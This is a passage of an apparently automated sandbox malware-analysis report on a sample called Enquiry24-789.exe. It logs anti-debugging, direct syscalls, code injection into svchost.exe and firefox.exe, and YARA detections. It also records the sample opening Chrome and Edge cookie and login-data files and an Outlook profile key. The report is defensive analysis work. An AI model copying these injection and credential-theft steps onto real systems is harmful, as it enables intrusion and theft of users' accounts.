Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458CB1 mov eax, dword ptr fs:[00000030h] 2_2_05458CB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 mov eax, dword ptr fs:[00000030h] 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 mov eax, dword ptr fs:[00000030h] 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 mov eax, dword ptr fs:[00000030h] 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 mov eax, dword ptr fs:[00000030h] 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4F42 mov eax, dword ptr fs:[00000030h] 2_2_054D4F42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CF50 mov eax, dword ptr fs:[00000030h] 2_2_0542CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CF50 mov eax, dword ptr fs:[00000030h] 2_2_0546CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D0F50 mov eax, dword ptr fs:[00000030h] 2_2_054D0F50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545AF69 mov eax, dword ptr fs:[00000030h] 2_2_0545AF69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2F60 mov eax, dword ptr fs:[00000030h] 2_2_054D2F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504F68 mov eax, dword ptr fs:[00000030h] 2_2_05504F68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E6F00 mov eax, dword ptr fs:[00000030h] 2_2_054E6F00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432F12 mov eax, dword ptr fs:[00000030h] 2_2_05432F12
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CF1F mov eax, dword ptr fs:[00000030h] 2_2_0546CF1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545EF28 mov eax, dword ptr fs:[00000030h] 2_2_0545EF28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432FC8 mov eax, dword ptr fs:[00000030h] 2_2_05432FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542EFD8 mov eax, dword ptr fs:[00000030h] 2_2_0542EFD8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544CFE0 mov eax, dword ptr fs:[00000030h] 2_2_0544CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05470FF6 mov eax, dword ptr fs:[00000030h] 2_2_05470FF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504FE7 mov eax, dword ptr fs:[00000030h] 2_2_05504FE7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E6FF7 mov eax, dword ptr fs:[00000030h] 2_2_054E6FF7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CF80 mov eax, dword ptr fs:[00000030h] 2_2_0546CF80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462F98 mov eax, dword ptr fs:[00000030h] 2_2_05462F98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542EE5A mov eax, dword ptr fs:[00000030h] 2_2_0542EE5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05502E4F mov eax, dword ptr fs:[00000030h] 2_2_05502E4F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436E71 mov eax, dword ptr fs:[00000030h] 2_2_05436E71
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B0E7F mov eax, dword ptr fs:[00000030h] 2_2_054B0E7F
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C30B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00C30B62
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C02622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C02622
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BF083F
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF09D5 SetUnhandledExceptionFilter, 0_2_00BF09D5
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BF0C21
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00446C80 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00446C80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0044872B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0044872B

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtCreateKey: Direct from: 0x76EF2C6C
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe protection: read write
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdchange.exe Thread register set: target process: 2292
Source: C:\Windows\SysWOW64\sdchange.exe Thread APC queued: target process: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe
Source: C:\Users\user\Desktop\Enquiry24-789.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E77008
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C31201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00C31201
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C12BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00C12BA5
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3B226 SendInput,keybd_event, 0_2_00C3B226
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00C522DA
Source: C:\Users\user\Desktop\Enquiry24-789.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Enquiry24-789.exe"
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C30B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00C30B62
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C31663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00C31663
Source: Enquiry24-789.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: FNvzpsCDjtsg.exe, 00000004.00000000.2402228730.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000002.3273621788.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000000.2700557627.0000000001801000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: Enquiry24-789.exe, FNvzpsCDjtsg.exe, 00000004.00000000.2402228730.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000002.3273621788.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000000.2700557627.0000000001801000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: FNvzpsCDjtsg.exe, 00000004.00000000.2402228730.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000002.3273621788.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000000.2700557627.0000000001801000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: FNvzpsCDjtsg.exe, 00000004.00000000.2402228730.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000002.3273621788.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000000.2700557627.0000000001801000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF0698 cpuid 0_2_00BF0698
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C48195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_00C48195
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C2D27A GetUserNameW, 0_2_00C2D27A
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_00C0B952
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BD42DE

Stealing of Sensitive Information

Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sdchange.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Enquiry24-789.exe Binary or memory string: WIN_81
Source: Enquiry24-789.exe Binary or memory string: WIN_XP
Source: Enquiry24-789.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Enquiry24-789.exe Binary or memory string: WIN_XPe
Source: Enquiry24-789.exe Binary or memory string: WIN_VISTA
Source: Enquiry24-789.exe Binary or memory string: WIN_7
Source: Enquiry24-789.exe Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C51204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00C51204
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C51806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00C51806